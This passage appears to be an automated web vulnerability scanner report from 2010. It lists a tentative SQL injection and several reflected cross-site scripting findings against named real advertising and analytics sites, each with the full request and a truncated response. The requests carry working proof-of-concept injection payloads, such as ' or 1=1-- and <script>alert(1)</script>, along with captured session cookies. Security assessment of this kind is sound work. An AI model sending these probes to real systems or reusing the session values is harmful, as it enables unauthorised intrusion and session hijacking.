document.write("<a target=_blank href=\"http://clk.atdmt.com/goiframe/185202019/167465860/direct\" onclick=\"(new Image).src='http://t.redcated'\"><img src=\"http://ec.redcated/b/WRSASSAS8S10/TCH_33
...[SNIP]...

2.10. https://www.insightexpress.com/ix/CreateNewAccount.asp [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   https://www.insightexpress.com
Path:   /ix/CreateNewAccount.asp

Issue detail

The REST URL parameter 2 appears to be vulnerable to SQL injection attacks. The payloads 19318216'%20or%201%3d1--%20 and 19318216'%20or%201%3d2--%20 were each submitted in the REST URL parameter 2. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /ix/CreateNewAccount.asp19318216'%20or%201%3d1--%20?pageid=39 HTTP/1.1
Host: www.insightexpress.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: mypets=-1c; __utmz=184297086.1292122414.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=184297086.1265186133.1292122414.1292122414.1292122544.2; __utmc=184297086; __utmb=184297086.8.10.1292122544;

Response 1 (redirected)

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
P3P: CP="NOI DSP COR NID CUR ADMa OUR STP STA"
Date: Sun, 12 Dec 2010 03:06:47 GMT
Connection: close
Content-Length: 23609

<form name="Form1" method="post" action="ShowSweepRules.aspx?id=1" id="Form1">
<div>
<input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKMTM5MDU0MjY4MA9kFgJmD2QWAgIBDxYCHgRUZXh0BZVODQo8ZGl2IGNsYXNzPVNlY3Rpb24xPg0KDQo8cCBjbGFzcz1Nc29Ob3JtYWwgc3R5bGU9J21zby1tYXJnaW4tdG9wLWFsdDphdXRvO21zby1tYXJnaW4tYm90dG9tLWFsdDphdXRvJz48Yj48c3Bhbg0Kc3R5bGU9J2ZvbnQtc2l6ZToxMi4wcHQ7Zm9udC1mYW1pbHk6QXJpYWw7Y29sb3I6IzAwMDA2Nic+Tk8gUFVSQ0hBU0UgTkVDRVNTQVJZPC9zcGFuPjwvYj48c3Bhbg0Kc3R5bGU9J2ZvbnQtc2l6ZToxMi4wcHQ7Zm9udC1mYW1pbHk6IlRpbWVzIE5ldyBSb21hbiInPjxvOnA+PC9vOnA+PC9zcGFuPjwvcD4NCg0KPHAgY2xhc3M9TXNvTm9ybWFsIHN0eWxlPSdtc28tbWFyZ2luLXRvcC1hbHQ6YXV0bzttc28tbWFyZ2luLWJvdHRvbS1hbHQ6YXV0byc+PGk+PHNwYW4NCnN0eWxlPSdmb250LWZhbWlseTpBcmlhbDtjb2xvcjojMzk0NTk0Jz5JbnNpZ2h0RXhwcmVzcyBTd2VlcHN0YWtlcyBpcyBvcGVuIG9ubHkNCnRvIGxlZ2FsIHJlc2lkZW50cyBvZiB0aGUgPC9zcGFuPjwvaT48c3QxOmNvdW50cnktcmVnaW9uPjxzdDE6cGxhY2U+PGk+PHNwYW4NCiAgc3R5bGU9J2ZvbnQtZmFtaWx5OkFyaWFsO2NvbG9yOiMzOTQ1OTQnPlVuaXRlZCBTdGF0ZXM8L3NwYW4+PC9pPjwvc3QxOnBsYWNlPjwvc3QxOmNvdW50cnktcmVnaW9uPjxpPjxzcGFuDQpzdHlsZT0nZm9udC1mYW1pbHk6QXJpYWw7Y29sb3I6IzM5NDU5NCc+LCBhZ2UgMTggb3Igb2xkZXIsIGFzIG9mIERlY2VtYmVyIDFzdCwNCjIwMDQ8L3NwYW4+PC9pPjxpPjxzcGFuIHN0eWxlPSdmb250LWZhbWlseTpBcmlhbDtjb2xvcjojNjY2NkZGJz4uPC9zcGFuPjwvaT48c3Bhbg0Kc3R5bGU9J2ZvbnQtc2l6ZToxMi4wcHQ7Zm9udC1mYW1pbHk6IlRpbWVzIE5ldyBSb21hbiInPjxvOnA+PC9vOnA+PC9zcGFuPjwvcD4NCg0KPG9sIHN0YXJ0PTEgdHlwZT0xPg0KIDxsaSBjbGFzcz1Nc29Ob3JtYWwgc3R5bGU9J21zby1tYXJnaW4tdG9wLWFsdDphdXRvO21hcmdpbi1ib3R0b206MTIuMHB0Ow0KICAgICBtc28tbGlzdDpsMCBsZXZlbDEgbGZvMTt0YWItc3RvcHM6bGlzdCAuNWluJz48Yj48c3BhbiBzdHlsZT0nZm9udC1mYW1pbHk6DQogICAgIEFyaWFsJz5UbyBFbnRlcjo8L3NwYW4+PC9iPjxzcGFuIHN0eWxlPSdmb250LWZhbWlseTpBcmlhbCc+IFlvdSBtdXN0DQogICAgIGNvbXBsZXRlIHRoZSBzdXJ2ZXkgYW5kIHF1YWxpZnkgdmlhIHRoZSBmb2xsb3dpbmcgbGluazogPGENCiAgICAgaHJlZj0iaHR0cDovL3d3dy5pbnNpZ2h0ZXhwcmVzcy5jb20vcy9CVzc5NTQzLmFzcCI+aHR0cDovL3d3dy5pbnNpZ2h0ZXhwcmVzcy5jb20vcy9CVzc5NTQzLmFzcDwvYT4NCiAgICAgU3VibWl0IHlvdXIgZW50cnkgYnkgZnVsbHkgY29tc
...[SNIP]...

Request 2

GET /ix/CreateNewAccount.asp19318216'%20or%201%3d2--%20?pageid=39 HTTP/1.1
Host: www.insightexpress.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: mypets=-1c; __utmz=184297086.1292122414.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=184297086.1265186133.1292122414.1292122414.1292122544.2; __utmc=184297086; __utmb=184297086.8.10.1292122544;

Response 2 (redirected)

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
P3P: CP="NOI DSP COR NID CUR ADMa OUR STP STA"
Date: Sun, 12 Dec 2010 03:06:49 GMT
Connection: close
Content-Length: 2356


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" >
<HTML>
   <HEAD>
       <title>Cannot find Page</title>
       
       <meta name="GENERATOR" Content="Microsoft Visual Studio .NET 7.1">
       <meta name="CODE_LANGUAGE" Content="C#">
       <meta name="vs_defaultClientScript" content="JavaScript">
       <meta name="vs_targetSchema" content="http://schemas.microsoft.com/intellisense/ie5">
       <link rel="stylesheet" href="/ixstyles.css" type="text/css">
   </HEAD>
   <body MS_POSITIONING="GridLayout">
    <form name="Form1" method="post" action="404.aspx?aspxerrorpath=%2fix%2fCreateNewAccount.asp19318216'+or+1%3d2--" id="Form1">
<div>
<input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKMTY2NjUyNDUxNA9kFgICAg9kFgICAQ8PFgIeBFRleHQFJmNyZWF0ZW5ld2FjY291bnQuYXNwMTkzMTgyMTYnIG9yIDE9Mi0tZGRkl0hQmLalgrwiNGNjX0+yihyiLBA=" />
</div>

<span id="Label1" style="display:inline-block;color:Navy;border-width:0px;border-style:None;font-family:Arial;font-size:Large;width:597px;">createnewaccount.asp19318216' or 1=2--</span>
<br>
</form>
       <table width="750" border="0" cellspacing="0" cellpadding="0" align="center" class="body">
   <tr>
       <td><img src="/images/404top.gif"></td>
   </tr>
   <tr>
       <td><br><br>
           <table width="400" border="0" cellspacing="0" cellpadding="0" align="center" class="body">
               <tr>
                   <td CLASS="SUBHEAD"><img src="/images/404Title.gif"><br><br></td>
               </tr>
               <tr>
                   <td><div align="left"><ul>
           <li><strong>Confirm that you have entered the URL correctly.</strong></li>
           <li><strong>The page may have been removed.</strong></li>
           <li><strong>Content may have expired.</strong></li>
           </ul></div></td>
               </tr>
               <tr>
                   <td align="center" class="body"><strong>Visit the <a href="http://www.insightexpress.com">InsightExpress</a> Home Page</strong><br><br><br><br></td>
               </tr>
                       </table>
                   </td>
   </tr>
   <tr>
       <t
...[SNIP]...

3. Cross-site scripting (reflected)  previous
There are 75 instances of this issue:

Issue background

Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application.

The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.

Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).

The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality which it contains, and the other applications which belong to the same domain and organisation. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain which can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organisation which owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application, and exploiting users' trust in the organisation in order to capture credentials for other applications which it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.

Remediation background

In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defenses:In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.


3.1. http://altfarm.mediaplex.com/ad/js/15017-106408-3768-0 [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://altfarm.mediaplex.com
Path:   /ad/js/15017-106408-3768-0

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b50c6'-alert(1)-'15c6e3874aa was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /ad/js/15017-106408-3768-0?b50c6'-alert(1)-'15c6e3874aa=1 HTTP/1.1
Host: altfarm.mediaplex.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=183366586.1289108887.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=183366586.1043956060.1289108887.1289108887.1289108887.1; svid=OPT-OUT;

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Cache-Control: no-cache
Content-Type: text/html
Content-Length: 230
Date: Sun, 12 Dec 2010 03:23:06 GMT

document.write('<a target="_blank" href="http://altfarm.mediaplex.com/ad/ck/15017-106408-3768-0?b50c6'-alert(1)-'15c6e3874aa=1"><img ismap border=0 src="http://img-cdn.mediaplex.com/0/15017/106408/955
...[SNIP]...

3.2. http://analytics.informationweek.com/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://analytics.informationweek.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload 36d38--><script>alert(1)</script>64961da578 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /?36d38--><script>alert(1)</script>64961da578=1 HTTP/1.1
Host: analytics.informationweek.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.215 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: iwkbtn_emc_101111=7192037394|1289542143541; s_nr=1289542256120; iwkbtn_101201=9297530625|1291241986731; __qca=P0-1196101997-1292112032216; iw_smb_vipre_101206=2370200911|1292121551825; PHPSESSID=krdg7a5b38teleu6mcddepsq63; s_cc=true; s_lv=1292122884384; s_lv_s=Less%20than%201%20day; s_sq=%5B%5BB%5D%5D; iwa_user_login_check=a3JkZzdhNWIzOHRlbGV1Nm1jZGRlcHNxNjM%3D

Response

HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 03:20:36 GMT
Server: Apache
X-Powered-By: PHP/5.3.2 ZendServer/5.0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: iwa_user_login_check=a3JkZzdhNWIzOHRlbGV1Nm1jZGRlcHNxNjM%3D; expires=Sat, 11-Dec-2010 17:20:36 GMT; path=/
Content-Type: text/html
Content-Length: 29329

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <!-- This Line will output the doctype we set inside the bootstrap file -->
<html xmlns="h
...[SNIP]...
ogin?service=http%3A%2F%2Fanalytics.informationweek.com%2F%3F36d38--%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E64961da578%3D1&siteId=300001&successfulLoginRedirect=http://analytics.informationweek.com/?36d38--><script>alert(1)</script>64961da578=1">
...[SNIP]...

3.3. http://analytics.informationweek.com/index/caslogin [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://analytics.informationweek.com
Path:   /index/caslogin

Issue detail

The value of REST URL parameter 1 is copied into an HTML comment. The payload 6b2f2--><script>alert(1)</script>2d02489b714 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /index6b2f2--><script>alert(1)</script>2d02489b714/caslogin HTTP/1.1
Host: analytics.informationweek.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1292122899863; s_cc=true; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; PHPSESSID=krdg7a5b38teleu6mcddepsq63; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; iw_smb_vipre_101206=2370200911|1292121551825; s_lv_s=Less%20than%201%20day; iwa_user_login_check=a3JkZzdhNWIzOHRlbGV1Nm1jZGRlcHNxNjM%3D; __qca=P0-1196101997-1292112032216;

Response

HTTP/1.1 404 Not Found
Date: Sun, 12 Dec 2010 03:24:02 GMT
Server: Apache
X-Powered-By: PHP/5.3.2 ZendServer/5.0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: iwa_user_login_check=a3JkZzdhNWIzOHRlbGV1Nm1jZGRlcHNxNjM%3D; expires=Sat, 11-Dec-2010 17:24:02 GMT; path=/
Connection: close
Content-Type: text/html
Content-Length: 45863

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <!-- This Line will output the doctype we set inside the bootstrap file -->
<html xmlns="h
...[SNIP]...
ttp%3A%2F%2Fanalytics.informationweek.com%2Findex6b2f2--%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E2d02489b714%2Fcaslogin&siteId=300001&successfulLoginRedirect=http://analytics.informationweek.com/index6b2f2--><script>alert(1)</script>2d02489b714/caslogin">
...[SNIP]...

3.4. http://analytics.informationweek.com/index/caslogin [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://analytics.informationweek.com
Path:   /index/caslogin

Issue detail

The value of REST URL parameter 2 is copied into an HTML comment. The payload 8d405--><script>alert(1)</script>2df70261864 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /index/caslogin8d405--><script>alert(1)</script>2df70261864 HTTP/1.1
Host: analytics.informationweek.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1292122899863; s_cc=true; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; PHPSESSID=krdg7a5b38teleu6mcddepsq63; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; iw_smb_vipre_101206=2370200911|1292121551825; s_lv_s=Less%20than%201%20day; iwa_user_login_check=a3JkZzdhNWIzOHRlbGV1Nm1jZGRlcHNxNjM%3D; __qca=P0-1196101997-1292112032216;

Response

HTTP/1.1 404 Not Found
Date: Sun, 12 Dec 2010 03:24:14 GMT
Server: Apache
X-Powered-By: PHP/5.3.2 ZendServer/5.0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 46007

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <!-- This Line will output the doctype we set inside the bootstrap file -->
<html xmlns="h
...[SNIP]...
%2Fanalytics.informationweek.com%2Findex%2Fcaslogin8d405--%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E2df70261864&siteId=300001&successfulLoginRedirect=http://analytics.informationweek.com/index/caslogin8d405--><script>alert(1)</script>2df70261864">
...[SNIP]...

3.5. http://analytics.informationweek.com/user/index/regsteptwo [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://analytics.informationweek.com
Path:   /user/index/regsteptwo

Issue detail

The value of REST URL parameter 1 is copied into an HTML comment. The payload 98914--><script>alert(1)</script>d96271c31ef was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /user98914--><script>alert(1)</script>d96271c31ef/index/regsteptwo HTTP/1.1
Host: analytics.informationweek.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1292122899863; s_cc=true; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; PHPSESSID=krdg7a5b38teleu6mcddepsq63; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; iw_smb_vipre_101206=2370200911|1292121551825; s_lv_s=Less%20than%201%20day; iwa_user_login_check=a3JkZzdhNWIzOHRlbGV1Nm1jZGRlcHNxNjM%3D; __qca=P0-1196101997-1292112032216;

Response

HTTP/1.1 404 Not Found
Date: Sun, 12 Dec 2010 03:24:24 GMT
Server: Apache
X-Powered-By: PHP/5.3.2 ZendServer/5.0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: iwa_user_login_check=a3JkZzdhNWIzOHRlbGV1Nm1jZGRlcHNxNjM%3D; expires=Sat, 11-Dec-2010 17:24:24 GMT; path=/
Connection: close
Content-Type: text/html
Content-Length: 45879

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <!-- This Line will output the doctype we set inside the bootstrap file -->
<html xmlns="h
...[SNIP]...
F%2Fanalytics.informationweek.com%2Fuser98914--%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3Ed96271c31ef%2Findex%2Fregsteptwo&siteId=300001&successfulLoginRedirect=http://analytics.informationweek.com/user98914--><script>alert(1)</script>d96271c31ef/index/regsteptwo">
...[SNIP]...

3.6. http://analytics.informationweek.com/user/index/regsteptwo [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://analytics.informationweek.com
Path:   /user/index/regsteptwo

Issue detail

The value of REST URL parameter 2 is copied into an HTML comment. The payload ee106--><script>alert(1)</script>1157d1e95c0 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /user/indexee106--><script>alert(1)</script>1157d1e95c0/regsteptwo HTTP/1.1
Host: analytics.informationweek.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1292122899863; s_cc=true; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; PHPSESSID=krdg7a5b38teleu6mcddepsq63; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; iw_smb_vipre_101206=2370200911|1292121551825; s_lv_s=Less%20than%201%20day; iwa_user_login_check=a3JkZzdhNWIzOHRlbGV1Nm1jZGRlcHNxNjM%3D; __qca=P0-1196101997-1292112032216;

Response

HTTP/1.1 404 Not Found
Date: Sun, 12 Dec 2010 03:24:36 GMT
Server: Apache
X-Powered-By: PHP/5.3.2 ZendServer/5.0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: iwa_user_login_check=a3JkZzdhNWIzOHRlbGV1Nm1jZGRlcHNxNjM%3D; expires=Sat, 11-Dec-2010 17:24:36 GMT; path=/
Connection: close
Content-Type: text/html
Content-Length: 45879

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <!-- This Line will output the doctype we set inside the bootstrap file -->
<html xmlns="h
...[SNIP]...
alytics.informationweek.com%2Fuser%2Findexee106--%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E1157d1e95c0%2Fregsteptwo&siteId=300001&successfulLoginRedirect=http://analytics.informationweek.com/user/indexee106--><script>alert(1)</script>1157d1e95c0/regsteptwo">
...[SNIP]...

3.7. http://analytics.informationweek.com/user/index/regsteptwo [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://analytics.informationweek.com
Path:   /user/index/regsteptwo

Issue detail

The value of REST URL parameter 3 is copied into an HTML comment. The payload f423e--><script>alert(1)</script>456331c0843 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /user/index/regsteptwof423e--><script>alert(1)</script>456331c0843 HTTP/1.1
Host: analytics.informationweek.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1292122899863; s_cc=true; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; PHPSESSID=krdg7a5b38teleu6mcddepsq63; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; iw_smb_vipre_101206=2370200911|1292121551825; s_lv_s=Less%20than%201%20day; iwa_user_login_check=a3JkZzdhNWIzOHRlbGV1Nm1jZGRlcHNxNjM%3D; __qca=P0-1196101997-1292112032216;

Response

HTTP/1.1 404 Not Found
Date: Sun, 12 Dec 2010 03:24:51 GMT
Server: Apache
X-Powered-By: PHP/5.3.2 ZendServer/5.0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 45889

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <!-- This Line will output the doctype we set inside the bootstrap file -->
<html xmlns="h
...[SNIP]...
ormationweek.com%2Fuser%2Findex%2Fregsteptwof423e--%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E456331c0843&siteId=300001&successfulLoginRedirect=http://analytics.informationweek.com/user/index/regsteptwof423e--><script>alert(1)</script>456331c0843">
...[SNIP]...

3.8. http://core.insightexpressai.com/adServer/GetInvite2.aspx [creativeID parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://core.insightexpressai.com
Path:   /adServer/GetInvite2.aspx

Issue detail

The value of the creativeID request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ca2f0'-alert(1)-'7afbef3b044 was submitted in the creativeID parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adServer/GetInvite2.aspx?esi=true&bannerID=161857&referer=www.darkreading.com&siteID=197028858&creativeID=142745208ca2f0'-alert(1)-'7afbef3b044 HTTP/1.1
Host: core.insightexpressai.com
Proxy-Connection: keep-alive
Referer: http://www.darkreading.com/blog/archives/evil-bytes/index.html
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.215 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: DW=9bba28d1288937145; IXAIFirstHit2316=11%2f5%2f2010+1%3a28%3a13+AM; IXAIBanners2316=172110,172110; IXAIBannerCounter172110=2; IXAILastHit2316=11%2f7%2f2010+12%3a13%3a36+AM; IXAICampaignCounter2316=2; IXAIBannerCounter170677=1; IXAIFirstHit2248=11%2f11%2f2010+6%3a45%3a17+PM; IXAIBanners2251=170722; IXAIBannerCounter170722=1; IXAIFirstHit2251=11%2f16%2f2010+3%3a23%3a43+PM; IXAILastHit2251=11%2f16%2f2010+3%3a23%3a43+PM; IXAICampaignCounter2251=1; IXAIFirstHit2211=11%2f16%2f2010+6%3a40%3a19+PM; IXAIBannerCounter169909=7; IXAIBanners2310=172498; IXAIBannerCounter172498=1; IXAIFirstHit2310=11%2f21%2f2010+6%3a20%3a21+PM; IXAILastHit2310=11%2f21%2f2010+6%3a20%3a21+PM; IXAICampaignCounter2310=1; IXAIBanners2211=169909,169909,169909,169909,169909,169909,169909,170103; IXAIBannerCounter170103=1; IXAILastHit2211=11%2f26%2f2010+3%3a00%3a00+PM; IXAICampaignCounter2211=8; IXAIBanners2044=166228; IXAIBannerCounter166228=1; IXAIFirstHit2044=11%2f26%2f2010+3%3a38%3a49+PM; IXAILastHit2044=11%2f26%2f2010+3%3a38%3a49+PM; IXAICampaignCounter2044=1; IXAIBannerCounter173394=1; IXAIFirstHit2357=12%2f1%2f2010+11%3a03%3a32+AM; IXAIBanners2357=173394,173401; IXAIBannerCounter173401=1; IXAILastHit2357=12%2f1%2f2010+10%3a53%3a57+AM; IXAICampaignCounter2357=2; lastInvite=12%2f1%2f2010+11%3a09%3a31+AM; IXAIinvited2357=true; IXAICampaignCounter2203=0; IXAIControlCounter2203=0; IXAIBannerCounter170478=0; IXAIBanners2203=170478,170478,170478; IXAIBanners2248=170677,170676; IXAIBannerCounter170676=1; IXAILastHit2248=12%2f11%2f2010+10%3a35%3a24+AM; IXAICampaignCounter2248=2; IXAICampaignCounter2018=0; IXAIControlCounter2018=0; IXAIBannerCounter169712=0; IXAIBanners2018=169712; IXAIBanners2284=171378; IXAIBannerCounter171378=1; IXAIFirstHit2284=12%2f11%2f2010+10%3a33%3a03+AM; IXAILastHit2284=12%2f11%2f2010+10%3a33%3a03+AM; IXAICampaignCounter2284=1; IXAIBannerCounter161858=1; IXAIFirstHit1946=12%2f11%2f2010+9%3a28%3a02+PM; IXAIBanners1946=161858,161857; IXAIBannerCounter161857=1; IXAILastHit1946=12%2f11%2f2010+9%3a53%3a03+PM; IXAICampaignCounter1946=2

Response

HTTP/1.1 200 OK
Content-Type: text/javascript; charset=utf-8
Vary: Accept-Encoding
Server: Microsoft-IIS/7.0
P3P: CP="OTI DSP COR CUR ADMi DEVi TAI PSA PSD IVD CONi TELi OUR BUS STA"
Date: Sun, 12 Dec 2010 03:10:37 GMT
Connection: close
Cache-Control: no-store
Content-Length: 19741

